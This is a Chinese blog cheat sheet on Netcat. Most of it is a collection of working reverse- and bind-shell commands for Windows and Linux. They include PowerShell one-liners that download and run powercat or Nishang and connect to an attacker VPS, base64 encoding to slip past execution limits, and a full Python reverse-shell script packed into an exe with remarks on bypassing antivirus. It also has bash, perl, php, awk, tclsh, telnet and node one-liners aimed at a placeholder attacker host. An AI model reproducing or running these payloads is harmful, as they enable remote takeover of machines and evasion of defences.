Netcat/nc 备忘

最新推荐文章于 2022-03-22 19:55:38 发布
最新推荐文章于 2022-03-22 19:55:38 发布
阅读量270 收藏
点赞数
分类专栏: 攻防 文章标签: 信息安全 扫描测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yajunserver/article/details/107715366
版权

win:https://eternallybored.org/misc/netcat/
linux: yum install nc -y

常用参数:
-l    开启监听
-p   指定一个端口
-v   显示详细输出
-e   指定对应的应用程序
-n   nc不要DNS反向查询IP的域名
-z   连接成功后立即关闭连接
-u  指定nc使用UDP协议,默认为TCP
-w  超时秒数,后面跟数字 

服务端:
nc -lvp 8888 -e /bin/bash       # Linux
nc -lvp 8888 -e c:\windows\system32\cmd.exe       #Windows

客户端:
nc 服务端ip 8888

 

Windows常见反弹shell手段:

powershell反弹cmd:

powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c vps-ip -p 8000 -e cmd

#或者下载以后执行
powershell Import-Module .\powercat.ps1;powercat -c 119.x.x.x -p 8000 -e cmd

powershell反弹powershell:

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress vps-ip -port 8000

注意某些特殊情况需要将powershell脚本进行base64编码,才能成功反弹。比如sqlserver的命令执行、php中system函数的执行

base64编码处理:

$text="IEX((New-Object System.Net.WebClient).DownloadString('http://192.168.203.140/a.ps1'))"
$Bytes=[System.Text.Encoding]::Unicode.GetBytes($Text);$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText > bs64.txt

目标机器执行:

powershell -exec bypass -encodedcommand base64.txt

python反弹cmd:

适用于Python2环境

# -*- coding:utf-8 -*-
import os
import select
import socket
import sys
import subprocess

def ReserveConnect(addr, port):
    '''反弹连接shell'''
    try:
        shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        shell.connect((addr,port))
    except Exception as reason:
        print ('[-] Failed to Create Socket : %s'%reason)
        exit(0)
    rlist = [shell]
    wlist = []
    elist = [shell]
    while True:
        shell.send("cmd:")
        rs,ws,es = select.select(rlist,wlist,wlist)
        for sockfd in rs:
            if sockfd == shell:
                command = shell.recv(1024)
                if command == 'exit':
                    shell.close()
                    break
                result, error = subprocess.Popen(command,shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE).communicate()
                shell.sendall(result.decode("GB2312").encode("UTF-8"))

# 主函数运行
def run():
    if len(sys.argv)<3:
        print('Usage: python reverse.py [IP] [PORT]')
    else:
        url = sys.argv[1]
        port = int(sys.argv[2])
        ReserveConnect(url,port)

if __name__ == '__main__':
    run()

考虑实战中可能没有python环境
可以先在本地上使用pyinstaller将改文件打包为exe文件,直接上传exe运行即可。(推荐使用)

#python默认不安装pyinstaller
pip install pyinstaller

#使用pyinstaller把py文件打包成exe文件
pyinstaller -Fw test666.py

实际测试bypass av效果也比较好。

 

Linux常见反弹shell手段:

首先在目标上查看相关命令是否存在:

whereis nc bash python php exec perl

某些目标的 nc 不支持 -e 参数,有两个解决思路
要么使用其他版本的 nc:

sudo apt install netcat-traditional
nc.traditional <your_vps> 1024 -e /bin/sh

要么配合命名管道进行反弹:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1 | nc <your_vps> 1024 >/tmp/f

用 bash 反弹:

/bin/bash -i >& /dev/tcp/<your_vps>/1024 0>&1

用Python反弹(优先使用,ctrl+c无法关闭):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<your_vps>",1024));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

用php反弹(优先使用,ctrl+c无法关闭):

php -r '$sock=fsockopen("<your_vps>",1024);exec("/bin/sh -i <&3 >&3 2>&3");'

用 exec 反弹:

0<&196;exec 196<>/dev/tcp/<your_vps>/1024; sh <&196 >&196 2>&196

用 telnet 反弹:

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet <your_vps> 1024 > f

用 perl 反弹(优先使用,ctrl+c无法关闭):

perl -e 'use Socket;$i="<your_vps>";$p=1024;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

用 Awk 反弹:

awk 'BEGIN {s = "/inet/tcp/0/<your_vps>/1024"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

用 TCLsh 反弹:

echo 'set s [socket <your_vps> 1024];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

用 NodeJS 反弹(推荐优先使用):

require('child_process').exec('nc -e /bin/sh <your_vps> 1024')

Linux下python反弹shell:

from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
    server=socket(AF_INET,SOCK_STREAM)
    server.bind(('0.0.0.0',8888))
    server.listen(5)
    print 'waiting for connect'
    talk, addr = server.accept()
    print 'connect from',addr
    proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
           stdout=talk, stderr=talk, shell=True)

此节转载作者:book4yi
此节转载链接:https://www.jianshu.com/p/913067492f05

 

 

 

 

 

 

EncodingH
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Netcat瑞士军刀的简单使用
谢公子的博客
11-15 2873
目录 Netcat 常用参数: 常见的用法: 端口扫描: 聊天 文件传输 反弹shell 蜜罐 Netcat Netcat常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思...
内网穿透(nc)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-28 3301
nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具, 能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具 ,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能, 它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。 客户端: 客户端: 主机 当肉鸡处于内网当中,需要主机有一个公网ip,然后让肉鸡主动连接主
python连接netcat监听的端口_python实现简单的netcat
weixin_39624071的博客
12-05 163
#! /usr/bin/env python#coding=utf-8importsysimportsocketimportgetoptimportthreadingimportsubprocess#定义一些全局变量listen =Falsecommand=Falseupload=Falseexecute= ""target= ""upload_destination= ""port=0defru...
Windows/Linux 下nc 反弹shell
SoulCat
06-11 1万+
*Windows/Linux 下nc 反弹shell 高二那年班主任对我们说:其实我并不反对你们谈恋爱, 只是你们记得要找一个有担当的, 那些一看见老师就松开你手的,要来有什么用? NC概述: nc又名netcat,一个简单而有用的工具,可以干很多事情,但是不可以吃。 何为反弹shell?为什么不反弹攻击? 相信你有一天可以直接把所有攻击反弹回去的. 何为反弹shell? 简单来说就...
python取代netcat第二步
以笔为剑的唐吉坷德
06-01 1582
[注]:以下内容大多来自于《python黑帽子编程》(包括代码) [参考文章]http://www.cnblogs.com/busui/p/6882744.html http://blog.csdn.net/q_l_s/article/details/52973599#t26 以上两位大神文章极其详尽,可以作为参考。 netcat是网络界的瑞士军刀,之前的学习已经有所接触。一般来说
netcat下载 nc下载 netcat命令 nc命令
02-10
【标题】"netcat下载 nc下载 netcat命令 nc命令"涉及的是网络工具Netcat的基本信息,包括下载和使用。Netcat,简称nc,是一个开源、跨平台的网络工具,常被网络安全专家和系统管理员用于创建各种网络连接,进行端口...
Netcat-nc.exe.zip
05-21
亲测可以成功运行,各种命令测试成功。其中包含nc.exe和nc64.exe。 可以获得目标主机的Shell,已成功实验。
NCNETCAT
02-24
NCNETCAT
端口转发netcatnc
02-12
端口转发工具 内网渗透 netcatnc) 端口转发工具 内网渗透 netcatnc
NC.rar_NC_netcat UDP
09-23
netcat是一个简单的读写网络连接数据的unix工具,用tcp和udp协议
NetCat简介
phone15062117684的博客
01-12 1万+
引言 在看一些博客之前,我一直纳闷NetCat是一只什么样的猫,居然可以被人称为瑞士军刀。莫非是一只来自瑞士的??于是,特意去网上查了查相关资料。以此整理,方便后续查阅和使用,同时方便一些新手用户入坑。 介绍 1.     netcat,我们需要把它拆分成2部分来看,net  cat,在Linux环境下,我们常用cat来输出文件内容,因此,在网络环境下,加上一个net,与Linux环境进
安装netcat
zj1244
05-04 512
centos 6.x:   yum install nc.x86_64 centos 7: yum install nmap-ncat.x86_64
远程代码执行(RCE)漏洞
谈谈1974
01-09 5155
文章目录1. Fastjson 远程代码执行漏洞2. 简单复现3. shell 反弹 1. Fastjson 远程代码执行漏洞 最近读到一篇文章 Fastjson 远程代码执行漏洞分析 2. 简单复现 攻击机器执行命令 nc -lvvp 9999,监听本机的 9999 端口 目标机器执行以下代码,会新开一个 shell 进程,将自身的输入输出通过 tcp连接传输到攻击者服务器上,从而渗透入侵。以下......
Redis未授权漏洞复现及利用(window,linux)
热门推荐
dreamthe的博客
03-22 1万+
1.了解redis Redis(Remote Dictionary Server ),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。从2010年3月15日起,Redis的开发工作由VMware主持。从2013年5月开始,Redis的开发由Pivota赞助。 2.redis漏洞原理 Redis默认情况下是绑定在0.0.0.0:6379端口的,如果没有设置密码(一般密码为空)或者密码为弱密码的情况下并且也没有
10种反弹shell方式
kevinhanser
03-30 4883
参考链接1:http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 参考链接2:https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html 10种反弹shell方式 2019年3月30日【原创】 bash perl py...
Linux中的nc测试端口是否开放
weixin_30307267的博客
08-09 1156
nc测试端口是否开放 在Linux中有一个级强大的网络工具netcat,在默认情况下面都是没有安装的,现在介绍一下安装过程其实安装很简单 一、安装使用 1、只需输入命令yum安装: [root@SZB-L0032015 ~]# yum install -y nc [root@SZB-L0032015 ~]# yum install -y nc Loaded plugins...
NetCat NC简介、安装步骤及测试监听发送
一只菜鸡
08-10 663
error: can’t create transaction lock on /var/lib/rpm/.rpm.lock (Permission denied)
渗透测试工具篇——NetCat
tomyyyyy
06-27 205
渗透测试工具篇——NetCat 简介 Netcat 常称为 nc,拥有“瑞士军刀”的美誉。nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell。 ...
linux netcat(nc)下载
最新发布
09-07
你可以使用以下命令下载并安装netcat(nc): 1. 首先,打开终端。 2. 确保你的系统已经安装了wget或curl。如果没有,请使用以下命令安装之一: - 对于Debian/Ubuntu系统:sudo apt install wget - 对于CentOS/RHEL系统:sudo yum install wget 3. 使用以下命令下载netcat(nc)的源代码: - 使用wget下载:wget https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz - 使用curl下载:curl -O https://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.gz 4. 解压下载的压缩文件: - 使用tar命令解压:tar -zxvf netcat-0.7.1.tar.gz 5. 进入解压后的目录: - cd netcat-0.7.1 6. 编译和安装netcat(nc): - 使用以下命令编译:make - 使用以下命令安装:sudo make install 完成以上步骤后,netcat(nc)将成功地安装在你的Linux系统中。你可以通过运行`nc`命令来验证安装是否成功。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值